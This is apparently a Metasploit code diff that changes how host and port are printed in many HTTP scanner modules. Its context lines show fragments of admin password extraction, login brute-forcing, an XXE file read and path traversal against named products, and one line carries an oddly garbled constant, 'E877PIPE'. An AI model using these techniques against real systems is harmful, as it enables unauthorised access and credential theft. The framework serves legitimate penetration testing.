-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
     if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?('IS2 Web Server') || res.body.include?("WEB'log")))
-      print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Meteocontrol WEBlog management portal...")
       return true
     else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.")
       return false
     end
   end
@@ -77,14 +77,14 @@ class MetasploitModule < Msf::Auxiliary
   #
 
   def do_extract()
-    print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to extract Administrator password...")
     begin
       res = send_request_cgi({
         'uri' => '/html/en/confAccessProt.html',
         'method' => 'GET'
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return
     end
 
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
       get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
       if get_admin_password[1]
         admin_password = get_admin_password[1]
-        print_good("#{rhost}:#{rport} - Password is #{admin_password}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Password is #{admin_password}")
         report_cred(
           ip: rhost,
           port: rport,
@@ -102,10 +102,10 @@ class MetasploitModule < Msf::Auxiliary
         )
       else
         # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Check login manually on http://IP:port/html/en/confAccessProt.html for the szWebAdminPassword field's value.
-        print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
+        print_error("Check login manually on http://#{Rex::Socket.to_authority(rhost, rport)}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
       end
     else
-      print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
+      print_error("Check login manually on http://#{Rex::Socket.to_authority(rhost, rport)}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
     end
   end
 

--- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
@@ -70,8 +70,8 @@ class MetasploitModule < Msf::Auxiliary
       if (not res)
         print_error("NO Response.")
       elsif (res.code.to_i == 401)
-        print_status("#{rhost}:#{rport} Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
-        print_status("#{rhost}:#{rport} \tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} \tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
 
         cset = %W{& ^ % $ # @ !}
         buff = ''
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
         }, 20)
 
         if (res.code.to_i == 207)
-          print_good("#{rhost}:#{rport} \tFound vulnerable WebDAV Unicode bypass.  #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} \tFound vulnerable WebDAV Unicode bypass.  #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
 
           report_vuln(
             {
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Auxiliary
 
         end
       else
-        print_error("#{rhost}:#{rport} Folder does not require authentication. [#{res.code}]")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} Folder does not require authentication. [#{res.code}]")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::E877PIPE

--- a/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb
+++ b/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Auxiliary
 
       res = send_soap_request('/dms/services/ServerUI', soap_body)
       unless res
-        vprint_error("#{rhost}:#{rport} - No response from server, stopping")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - No response from server, stopping")
         return [nil, nil]
       end
 
@@ -183,11 +183,11 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     unless file_content
-      vprint_status("#{rhost}:#{rport} - XXE triggered but could not extract file contents from response (timeout or no content)")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - XXE triggered but could not extract file contents from response (timeout or no content)")
       return
     end
 
-    print_good("#{rhost}:#{rport} - XXE file read succeeded (CVE-2025-11700)")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - XXE file read succeeded (CVE-2025-11700)")
     print_line
     print_line(file_content)
     print_line
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_soap_request('/dms/services/ServerMMS', soap_body)
     unless res
-      vprint_error("#{rhost}:#{rport} - No response from server when writing XXE payload, stopping")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - No response from server when writing XXE payload, stopping")
       return false
     end
     res.code == 200

--- a/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
+++ b/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
       nagios_version_result, error_message = nagios_xi_version_no_auth
 
       if error_message
-        print_error("#{rhost}:#{rport} - #{error_message}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{error_message}")
         print_warning('Please provide a valid Nagios XI USERNAME and PASSWORD, or a specific VERSION to check')
         return
       end
@@ -161,22 +161,22 @@ class MetasploitModule < Msf::Auxiliary
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
     when 1..3 # An error occurred
-      print_error("#{rhost}:#{rport} - #{res_array[0]}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{res_array[0]}")
       return
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
       if install_result
-        print_error("#{rhost}:#{rport} - #{install_result[1]}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{install_result[1]}")
         return
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
       when 1..3 # An error occurred
-        print_error("#{rhost}:#{rport} - #{res_array[0]}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{res_array[0]}")
         return
       when 4 # Nagios XI is still not fully installed
-        print_error("#{rhost}:#{rport} - Failed to install Nagios XI on the target.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to install Nagios XI on the target.")
         return
       end
     end
@@ -187,17 +187,17 @@ class MetasploitModule < Msf::Auxiliary
       auth_cookies, nsp = res_array
       sign_license_result = sign_license_agreement(auth_cookies, nsp)
       if sign_license_result
-        print_error("#{rhost}:#{rport} - #{sign_license_result[1]}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{sign_license_result[1]}")
         return
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
       when 1..3
-        print_error("#{rhost}:#{rport} - #{res_array[0]}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{res_array[0]}")
         return
       when 5 # the Nagios XI license agreement still has not been signed
-        print_error("#{rhost}:#{rport} - Failed to sign the license agreement.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to sign the license agreement.")
         return
       end
     end
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
     # Obtain the Nagios XI version
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      print_error("#{rhost}:#{rport} - Unable to obtain the Nagios XI version from the dashboard")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to obtain the Nagios XI version from the dashboard")
       return
     end
 

--- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb
+++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if res.code == 404
-      print_error("#{rhost}:#{rport} - File not found")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - File not found")
       return
     end
 

--- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb
+++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb
@@ -54,12 +54,12 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     unless res1
-      vprint_status("#{rhost}:#{rport} No reply to the initial JSON request")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the initial JSON request")
       return
     end
 
     if res1.code.to_s =~ /^[5]/
-      vprint_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request, double check TARGETURI and HTTP_METHOD")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} The server replied with #{res1.code} for our initial JSON request, double check TARGETURI and HTTP_METHOD")
       return
     end
 
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
     res2 = send_probe("--- {}\n".gsub(':', '\u003a'))
 
     unless res2
-      vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the initial YAML probe")
       return
     end
 
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
     res3 = send_probe("--- !ruby/object:\x00".gsub(':', '\u003a'))
 
     unless res3
-      vprint_status("#{rhost}:#{rport} No reply to the second YAML probe")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the second YAML probe")
       return
     end
 
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)
       # If first and second requests are the same, and the third is different but not a 200, we're vulnerable.
-      print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
       report_vuln({
         :host	=> rhost,
         :port	=> rport,
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
       })
     else
       # Otherwise we're not likely vulnerable.
-      vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI & HTTP_METHOD must be set")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} is not likely to be vulnerable or TARGETURI & HTTP_METHOD must be set")
     end
   end
 end

--- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb
+++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb
@@ -53,33 +53,33 @@ class MetasploitModule < Msf::Auxiliary
     res1 = send_probe("string", "hello")
 
     unless res1
-      vprint_status("#{rhost}:#{rport} No reply to the initial XML request")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the initial XML request")
       return
     end
 
     if res1.code.to_s =~ /^[5]/
-      vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
       return
     end
 
     res2 = send_probe("yaml", "--- !ruby/object:Time {}\n")
 
     unless res2
-      vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the initial YAML probe")
       return
     end
 
     res3 = send_probe("yaml", "--- !ruby/object:\x00")
 
     unless res3
-      vprint_status("#{rhost}:#{rport} No reply to the second YAML probe")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} No reply to the second YAML probe")
       return
     end
 
     vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}")
 
     if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)
-      print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
       report_vuln({
         :host	=> rhost,
         :port	=> rport,
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
         :refs => self.references
       })
     else
-      vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set")
     end
   end
 end

--- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
+++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
@@ -57,15 +57,15 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if response.nil?
-      vprint_error "#{rhost}:#{rport} Request timed out"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} Request timed out"
       return nil
     end
 
     seconds_transpired = (responded_at - requested_at).to_f
-    vprint_status "#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}"
+    vprint_status "#{Rex::Socket.to_authority(rhost, rport)} Server took #{seconds_transpired} seconds to respond to URI #{uri}"
 
     status_code = response.code
-    vprint_status "#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}"
+    vprint_status "#{Rex::Socket.to_authority(rhost, rport)} Server responded with status code #{status_code} to URI #{uri}"
 
     return {
       :requested_at => requested_at,
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if baseline[:status_code] == test_status_code
-      vprint_error "#{rhost}:#{rport} The baseline status code for #{host} matches our test's"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} The baseline status code for #{host} matches our test's"
       return
     end
 
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
 
     status_code = injection_info[:status_code]
     if status_code == test_status_code
-      print_good "#{rhost}:#{rport} Server appears to be vulnerable!"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} Server appears to be vulnerable!"
       report_vuln(
         :host => host,
         :port => rport,

--- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
+++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
@@ -48,13 +48,13 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless is_app_rfreader?
-      print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be RFCode Reader. Module will not continue.")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Checking if authentication is required...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking if authentication is required...")
     unless is_auth_required?
-      print_warning("#{rhost}:#{rport} - Application does not require authentication.")
+      print_warning("#{Rex::Socket.to_authority(rhost, rport)} - Application does not require authentication.")
       user = ''
       pass = ''
 
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    print_status("#{rhost}:#{rport} - Brute-forcing...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Brute-forcing...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Auxiliary
   # Brute-force the login page
   #
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_cgi(
         {
@@ -127,9 +127,9 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if not res or res.code == 401
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
       else
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         collect_info(user, pass)
 
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Auxiliary
         return :next_user
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Auxiliary
   # Collect target info
   #
   def collect_info(user, pass)
-    vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
     begin
       res = send_request_cgi(
         {
@@ -198,8 +198,8 @@ class MetasploitModule < Msf::Auxiliary
         release_ver = JSON.parse(res.body)["release"]
         product_name = JSON.parse(res.body)["product"]
 
-        vprint_status("#{rhost}:#{rport} - Collecting device platform info...")
-        vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Collecting device platform info...")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Release version: '#{release_ver}', Product Name: '#{product_name}'")
 
         report_note(
           :host => rhost,
@@ -228,8 +228,8 @@ class MetasploitModule < Msf::Auxiliary
 
       if res and res.body
         userlist = JSON.parse(res.body)
-        vprint_status("#{rhost}:#{rport} - Collecting user list...")
-        vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Collecting user list...")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - User list & role: #{userlist}")
 
         report_note(
           :host => rhost,
@@ -255,8 +255,8 @@ class MetasploitModule < Msf::Auxiliary
 
       if res and res.body
         eth0_info = JSON.parse(res.body)["eth0"]
-        vprint_status("#{rhost}:#{rport} - Collecting interface info...")
-        vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Collecting interface info...")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Interface eth0 info: #{eth0_info}")
 
         report_note(
           :host	=> rhost,
@@ -270,10 +270,10 @@ class MetasploitModule < Msf::Auxiliary
 
       return
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed while collecting info")
       return
     rescue JSON::ParserError
-      vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to parse JSON response while collecting info")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_user(user = 'administrator', pass = 'pass')
-    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:'#{user}' password:'#{pass}'")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xmlns = 'http://session.dsws.businessobjects.com/2007/06/01'
@@ -102,12 +102,12 @@ class MetasploitModule < Msf::Auxiliary
       success = true if (res and res.body.match(/SessionInfo/i))
       success
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Unable to attempt authentication")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to attempt authentication")
       return :abort
     end
 
     if success
-      print_good("#{rhost}:#{rport} - Successful login '#{user}' : '#{pass}'")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login '#{user}' : '#{pass}'")
       report_cred(
         ip: rhost,
         port: rport,
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
       )
       return :next_user
     else
-      vprint_error("#{rhost}:#{rport} - Failed to login as '#{user}'")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to login as '#{user}'")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_user(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:'#{user}' password: '#{pass}'")
     success = false
     data = 'isFromLogonPage=true&cms=127.0.1%3A6400'
     data << "&username=#{Rex::Text.uri_encode(user.to_s)}"

--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_user(user = 'administrator', pass = 'invalid-sap-password-0d03b389-b7a1-4ecc-8898-e62d1836b72a')
-    vprint_status("#{rhost}:#{rport} - Enumerating username:'#{user}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Enumerating username:'#{user}'")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xmlns = 'http://session.dsws.businessobjects.com/2007/06/01'

--- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_version(rhost)
-    print_status("Identifying SAP BusinessObjects on #{rhost}:#{rport}")
+    print_status("Identifying SAP BusinessObjects on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xmlns = 'http://session.dsws.businessobjects.com/2007/06/01'

--- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
+++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
@@ -41,11 +41,11 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless is_app_sentry?
-      print_error("#{rhost}:#{rport} - Sentry Switched CDU not found. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Sentry Switched CDU not found. Module will not continue.")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Starting login brute force...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting login brute force...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if (res and res.body.include?("Sentry Switched CDU"))
-      vprint_good("#{rhost}:#{rport} - Running ServerTech Sentry Switched CDU")
+      vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Running ServerTech Sentry Switched CDU")
       return true
     else
       return false
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Auxiliary
   # Brute-force the login page
   #
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_cgi(
         {
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if res and !res.get_cookies.empty?
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         report_cred(
           ip: rhost,
@@ -129,10 +129,10 @@ class MetasploitModule < Msf::Auxiliary
         return :next_user
 
       else
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end

--- a/modules/auxiliary/scanner/http/sevone_enum.rb
+++ b/modules/auxiliary/scanner/http/sevone_enum.rb
@@ -40,11 +40,11 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless is_app_sevone?
-      print_error("#{rhost}:#{rport} - Application does not appear to be SevOne. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be SevOne. Module will not continue.")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Starting login brute force...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting login brute force...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
     if (res and res.code.to_i == 200 and res.get_cookies.include?('SEVONE'))
       version_key = /Version: <strong>(.+)<\/strong>/
       version = res.body.scan(version_key).flatten
-      print_good("#{rhost}:#{rport} - Application confirmed to be SevOne Network Performance Management System version #{version}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Application confirmed to be SevOne Network Performance Management System version #{version}")
       return true
     end
     return false
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Auxiliary
   # Brute-force the login page
   #
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:'#{user.inspect}' with password:'#{pass.inspect}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:'#{user.inspect}' with password:'#{pass.inspect}'")
     begin
       res = send_request_cgi(
         {
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if res.nil?
-        print_error("#{rhost}:#{rport} - Connection timed out")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection timed out")
         return :abort
       end
 
@@ -127,10 +127,10 @@ class MetasploitModule < Msf::Auxiliary
       key = JSON.parse(res.body)["statusString"]
 
       if (not res or key != "#{check_key}")
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}")
         return :skip_pass
       else
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'")
         report_cred(
           ip: rhost,
           port: rport,
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Auxiliary
         return :next_user
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end

--- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
+++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
@@ -86,16 +86,16 @@ class MetasploitModule < Msf::Auxiliary
       }, 25)
       http_fingerprint({ :response => res })
     rescue ::Rex::ConnectionError => e
-      vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
+      vprint_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{uri} - #{e}")
       return
     end
 
     if not res
-      vprint_error("http://#{rhost}:#{rport}#{uri} - No response")
+      vprint_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{uri} - No response")
       return
     end
     if res.code != 401
-      vprint_error("http://#{rhost}:#{rport}#{uri} - Authorization not requested")
+      vprint_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{uri} - Authorization not requested")
       return
     end
 

--- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb
+++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
     if (res and res.code == 200 and res.body !~ /\<\/HTML/)
       out = false
 
-      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Request may have succeeded on file #{file}")
       report_web_vuln({
         :host => rhost,
         :port => rport,
@@ -79,10 +79,10 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       loot = store_loot("tplink.traversal.data", "text/plain", rhost, res.body, file)
-      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
+      vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - File #{file} downloaded to: #{loot}")
 
       if datastore['VERBOSE']
